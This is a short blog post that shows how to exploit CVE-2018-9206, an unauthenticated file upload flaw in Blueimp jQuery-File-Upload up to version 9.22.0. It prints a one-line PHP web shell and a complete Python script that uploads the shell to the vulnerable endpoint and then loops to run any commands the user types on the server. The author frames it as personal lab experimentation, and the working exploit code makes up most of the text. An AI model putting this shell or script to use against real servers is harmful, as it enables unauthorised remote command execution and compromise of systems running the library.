Exploiting jQuery-File-Upload 9.22.0

    CVE-2018-9206:  Unauthenticated arbitrary file upload vulnerability in Blueimp jQuery-File-Upload <= v9.22.0

    Alternatively known as the "eight year zero day".  Lots of vulnerabilities going unnoticed although eight years seems like a bit much.

    I found this vulnerable version, set it up on a server, and decided to play around with an automated version of:

    <?php $cmd=$_GET['cmd']; system($cmd);?>

    Exploit-DB has an exploit already but you can use curl -F to upload a shell with the above syntax.  You could push up a reverse shell as well but I got to thinking, what if I did a little bit of automation:


    #!/usr/bin/python
    import requests
    # defining the host
    host='http://192.168.90.34'
    # defining our shell code
    shell='<?php $cmd=$_GET["cmd"]; system($cmd);?>'
    # writing the shell in our file system for upload
    f=open("jqshell.php","w+")
    f.write(shell)
    f.close()
    # defining the jquery path
    url=host+'/jquery/server/php/index.php'
    # posting the shell to the server
    files = {'files': open('jqshell.php', 'rb')}
    r = requests.post(url, files=files)
    shellloc=host+'/jquery/server/php/files/jqshell.php?cmd='
    # with our shell uploaded, I've created a loop for executing local system commands
    while True:
        command=raw_input("command to execute: ")
        combined=shellloc+command
        r = requests.get(combined)
        print r.content


    I've commented it well enough, I think.  Basically, I'm creating the cmd shell in my script, I'm uploading it, and then I'm looping the url so we can just type commands instead of the typical cmd.php?=xxx where xxx is the command.

    For me, I learned a new trick -- curl -F basically acts like a user hitting the submit button on a form and the Python equivalent is the commented section "posting the shell to the server".


    © 2020 sevenlayers.com